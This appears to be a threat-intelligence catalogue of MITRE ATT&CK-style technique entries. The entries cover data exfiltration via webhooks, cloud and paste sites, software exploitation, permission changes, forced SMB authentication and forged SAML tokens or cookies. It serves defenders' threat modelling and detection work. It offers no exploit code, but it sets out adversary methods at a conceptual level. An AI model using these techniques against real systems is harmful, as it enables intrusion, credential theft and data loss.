Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://app.tidalcyber.com/technique/26abc19f-5968-45f1-aa1f-f35863a2f804) of emails, chat messages, and other data.<sup>[[Push Security SaaS Attacks Repository Webhooks](https://app.tidalcyber.com/references/519693e2-71c9-55d2-98fd-be451837582a)]</sup> Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.<sup>[[Microsoft SQL Server](https://app.tidalcyber.com/references/a904fde8-b8f9-5411-ab46-0dacf39cc81f)]</sup>

Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.<sup>[[CyberArk Labs Discord](https://app.tidalcyber.com/references/4b3cd2c0-fd0b-5583-8746-648229fc5f9d)]</sup><sup>[[Talos Discord Webhook Abuse](https://app.tidalcyber.com/references/affa93d8-5c8b-557d-80b4-1366df13d77a)]</sup><sup>[[Checkmarx Webhooks](https://app.tidalcyber.com/references/f68f1151-839e-5ae7-bab1-aa2b4c0d11ec)]</sup>

The tag is: misp-galaxy:technique="Exfiltration Over Webhook"

Exfiltration to Cloud Storage

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

The tag is: misp-galaxy:technique="Exfiltration to Cloud Storage"

Exfiltration to Code Repository

Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.

Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.

The tag is: misp-galaxy:technique="Exfiltration to Code Repository"

Exfiltration to Text Storage Sites

Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used by developers to share code and other information.

Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://app.tidalcyber.com/technique/ec2a76e6-3530-43e1-9e80-686e4b214ac8)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.<sup>[[Pastebin EchoSec](https://app.tidalcyber.com/references/3fc422e5-9a1d-5ac4-8e65-1df13d8a688e)]</sup>

Note: This is distinct from [Exfiltration to Code Repository](https://app.tidalcyber.com/technique/c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1), which highlight access to code repositories via APIs.

The tag is: misp-galaxy:technique="Exfiltration to Text Storage Sites"

Exfiltration Over Web Service

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:technique="Exfiltration Over Web Service"

Exploitation for Client Execution

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.

Several types exist:

Browser-based Exploitation

Web browsers are a common target through [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) and [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.

The tag is: misp-galaxy:technique="Exploitation for Client Execution"

Exploitation for Credential Access

Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 

Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.<sup>[[Technet MS14-068](https://app.tidalcyber.com/references/db78c095-b7b2-4422-8473-49d4a1129b76)]</sup><sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup> Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don’t properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.<sup>[[Bugcrowd Replay Attack](https://app.tidalcyber.com/references/ed31056c-23cb-5cb0-9b70-f363c54b27f7)]</sup><sup>[[Comparitech Replay Attack](https://app.tidalcyber.com/references/a9f0b569-8f18-579f-bf98-f4f9b93e5524)]</sup><sup>[[Microsoft Midnight Blizzard Replay Attack](https://app.tidalcyber.com/references/5af0008b-0ced-5d1d-bbc9-6c9d60835071)]</sup>

Such exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.<sup>[[Storm-0558 techniques for unauthorized email access](https://app.tidalcyber.com/references/74fd79a9-09f7-5149-a457-687a1e2989de)]</sup>

Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.

The tag is: misp-galaxy:technique="Exploitation for Credential Access"

Exploitation for Defense Evasion

Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.

Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.

There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries <sup>[[Salesforce zero-day in facebook phishing attack](https://app.tidalcyber.com/references/cbd360bb-f4b6-5326-8861-b05f3a2a8737)]</sup>, evade security logs <sup>[[Bypassing CloudTrail in AWS Service Catalog](https://app.tidalcyber.com/references/de50bd67-96bb-537c-b91d-e541a717b7a1)]</sup>, or deploy hidden infrastructure.<sup>[[GhostToken GCP flaw](https://app.tidalcyber.com/references/3f87bd65-4194-5be6-93a1-acde6eaef547)]</sup>

The tag is: misp-galaxy:technique="Exploitation for Defense Evasion"

Exploitation for Privilege Escalation

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.

Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup> Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) or [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f).

The tag is: misp-galaxy:technique="Exploitation for Privilege Escalation"

Exploitation of Remote Services

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://app.tidalcyber.com/technique/5bab1234-8d1e-437f-88a0-d527b2dfc6cd) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB <sup>[[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)]</sup> and RDP <sup>[[NVD CVE-2017-0176](https://app.tidalcyber.com/references/82602351-0ab0-48d7-90dd-f4536b4d009b)]</sup> as well as applications that may be used within internal networks such as MySQL <sup>[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)]</sup> and web server services.<sup>[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]</sup>

Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c) as a result of lateral movement exploitation as well.

The tag is: misp-galaxy:technique="Exploitation of Remote Services"

Exploit Public-Facing Application

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.<sup>[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)]</sup><sup>[[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)]</sup><sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup><sup>[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]</sup> Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391).

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://app.tidalcyber.com/technique/bebaf25b-9f50-4e3b-96cc-cc55c5765b61), or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.<sup>[[Mandiant Fortinet Zero Day](https://app.tidalcyber.com/references/7bdc5bbb-ebbd-5eb8-bd10-9087c883aea7)]</sup><sup>[[Wired Russia Cyberwar](https://app.tidalcyber.com/references/28c53a97-5500-5bfb-8aac-3c0bf94c2dfe)]</sup>

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.<sup>[[OWASP Top 10](https://app.tidalcyber.com/references/c6db3a77-4d01-4b4d-886d-746d676ed6d0)]</sup><sup>[[CWE top 25](https://app.tidalcyber.com/references/d8ee8b1f-c18d-48f3-9758-6860cd31c3e3)]</sup>

The tag is: misp-galaxy:technique="Exploit Public-Facing Application"

External Remote Services

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b) and [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) can also be used externally.<sup>[[MacOS VNC software for Remote Desktop](https://app.tidalcyber.com/references/c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af)]</sup>

Access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.<sup>[[Volexity Virtual Private Keylogging](https://app.tidalcyber.com/references/b299f8e7-01da-4d59-9657-ef93cf284cc0)]</sup> Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.<sup>[[Trend Micro Exposed Docker Server](https://app.tidalcyber.com/references/05c8909c-749c-4153-9a05-173d5d7a80a9)]</sup><sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup>

The tag is: misp-galaxy:technique="External Remote Services"

Fallback Channels

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

The tag is: misp-galaxy:technique="Fallback Channels"

File and Directory Discovery

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.<sup>[[Windows Commands JPCERT](https://app.tidalcyber.com/references/9d935f7f-bc2a-4d09-a51a-82074ffd7d77)]</sup> Custom tools may also be used to gather file and directory information and interact with the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560). Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>

The tag is: misp-galaxy:technique="File and Directory Discovery"

Linux and Mac File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: <code>chown</code> (short for change owner), and <code>chmod</code> (short for change mode).

Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow]([20 macOS Common Tools and Techniques(https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>

The tag is: misp-galaxy:technique="Linux and Mac File and Directory Permissions Modification"

Windows File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).<sup>[[Microsoft DACL May 2018](https://app.tidalcyber.com/references/32a250ca-a7eb-4d7f-af38-f3e6a09540e2)]</sup> Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.<sup>[[Microsoft Access Control Lists May 2018](https://app.tidalcyber.com/references/2aeda95a-7741-4a74-a5a4-29a9e7a89451)]</sup>

Adversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), [Boot or Logon Initialization Scripts](https://app.tidalcyber.com/technique/c51f799b-7305-43db-8d3b-657965cad68a), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).

The tag is: misp-galaxy:technique="Windows File and Directory Permissions Modification"

File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.<sup>[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)]</sup><sup>[[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)]</sup> File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), [Boot or Logon Initialization Scripts](https://app.tidalcyber.com/technique/c51f799b-7305-43db-8d3b-657965cad68a), [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).

Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.<sup>[[new_rust_based_ransomware](https://app.tidalcyber.com/references/8206240f-c84e-442e-b025-f629e9cc8d91)]</sup><sup>[[bad_luck_blackcat](https://app.tidalcyber.com/references/0d1e9635-b7b6-454b-9482-b1fc7d33bfff)]</sup><sup>[[falconoverwatch_blackcat_attack](https://app.tidalcyber.com/references/9d0ff77c-09e9-4d58-86f4-e2398f298ca9)]</sup><sup>[[blackmatter_blackcat](https://app.tidalcyber.com/references/605b58ea-9544-49b8-b3c8-0a97b2b155dc)]</sup><sup>[[fsutil_behavior](https://app.tidalcyber.com/references/07712696-b1fd-4704-b157-9e420840fb2c)]</sup>

The tag is: misp-galaxy:technique="File and Directory Permissions Modification"

Financial Theft

Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,<sup>[[FBI-ransomware](https://app.tidalcyber.com/references/54e296c9-edcc-5af7-99be-b118da29711f)]</sup> business email compromise (BEC) and fraud,<sup>[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)]</sup> "pig butchering,"<sup>[[wired-pig butchering](https://app.tidalcyber.com/references/dc833e17-7105-5790-b30b-b4fed7fd2d2f)]</sup> bank hacking,<sup>[[DOJ-DPRK Heist](https://app.tidalcyber.com/references/c50d2a5b-1d44-5f18-aaff-4be9f6d3f3ac)]</sup> and exploiting cryptocurrency networks.<sup>[[BBC-Ronin](https://app.tidalcyber.com/references/8e162e39-a58f-5ba0-9a8e-101d4cfa324c)]</sup>

Adversaries may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) to conduct unauthorized transfers of funds.<sup>[[Internet crime report 2022](https://app.tidalcyber.com/references/ef30c4eb-3da3-5c7b-a304-188acd2f7ebc)]</sup> In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.<sup>[[FBI-BEC](https://app.tidalcyber.com/references/3388bfec-7822-56dc-a384-95aa79f42fe8)]</sup> This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.<sup>[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]</sup>

Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) <sup>[[NYT-Colonial](https://app.tidalcyber.com/references/58900911-ab4b-5157-968c-67fa69cc122d)]</sup> and [Exfiltration](https://app.tidalcyber.com/tactics/66249a6d-be4e-43ab-a295-349d03a98023) of data, followed by threatening public exposure unless payment is made to the adversary.<sup>[[Mandiant-leaks](https://app.tidalcyber.com/references/aecc3ffb-c524-5ad9-b621-7228f53e27c3)]</sup>

Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and business disruption.<sup>[[AP-NotPetya](https://app.tidalcyber.com/references/7f1af58a-33fd-538f-b092-789a8776780c)]</sup>

The tag is: misp-galaxy:technique="Financial Theft"

Firmware Corruption

Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.<sup>[[Symantec Chernobyl W95.CIH](https://app.tidalcyber.com/references/a35cab17-634d-4a7a-a42c-4a4280e8785d)]</sup> Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.

In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.<sup>[[dhs_threat_to_net_devices](https://app.tidalcyber.com/references/f1d16045-d365-43d2-bc08-65ba1ddbe0fd)]</sup><sup>[[cisa_malware_orgs_ukraine](https://app.tidalcyber.com/references/ebe89b36-f87f-4e09-8030-a1328c0b8683)]</sup> Depending on the device, this attack may also result in [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34).

The tag is: misp-galaxy:technique="Firmware Corruption"

Forced Authentication

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. <sup>[[Wikipedia Server Message Block](https://app.tidalcyber.com/references/3ea03c65-12e0-4e28-bbdc-17bb8c1e1831)]</sup> This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. <sup>[[Didier Stevens WebDAV Traffic](https://app.tidalcyber.com/references/b521efe2-5c1c-48c5-a2a9-95da2367f537)]</sup> <sup>[[Microsoft Managing WebDAV Security](https://app.tidalcyber.com/references/eeb7cd82-b116-4989-b3fa-968a23f839f3)]</sup>

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://app.tidalcyber.com/technique/02b8e7c1-0db7-43f5-a5bc-531b30395122)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user’s system accesses the untrusted resource it will attempt authentication and send information, including the user’s hashed credentials, over SMB to the adversary controlled server. <sup>[[GitHub Hashjacking](https://app.tidalcyber.com/references/d31f6612-c552-45e1-bf6b-889fe619ab5f)]</sup> With access to the credential hash, an adversary can perform off-line [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) cracking to gain access to plaintext credentials. <sup>[[Cylance Redirect to SMB](https://app.tidalcyber.com/references/32c7626a-b284-424c-8294-7fac37e71336)]</sup>

There are several different ways this can occur. <sup>[[Osanda Stealing NetNTLM Hashes](https://app.tidalcyber.com/references/991f885e-b3f4-4f3f-b0f9-c9862f918f36)]</sup> Some specifics from in-the-wild use include:

The tag is: misp-galaxy:technique="Forced Authentication"

SAML Tokens

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.<sup>[[Microsoft SolarWinds Steps](https://app.tidalcyber.com/references/33e84eb1-4835-404b-8c1a-40695c04cdb4)]</sup> The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions …​</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.<sup>[[Microsoft SAML Token Lifetimes](https://app.tidalcyber.com/references/8b810f7c-1f26-420b-9014-732f1469f145)]</sup> Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.<sup>[[Cyberark Golden SAML](https://app.tidalcyber.com/references/58083370-8126-47d3-827c-1910ed3f4b2a)]</sup>

An adversary may utilize [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a) to compromise an organization’s token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup> This differs from [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup>

The tag is: misp-galaxy:technique="SAML Tokens"

Web Cookies

Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.

Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup> The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a), or other cryptographic seed values.

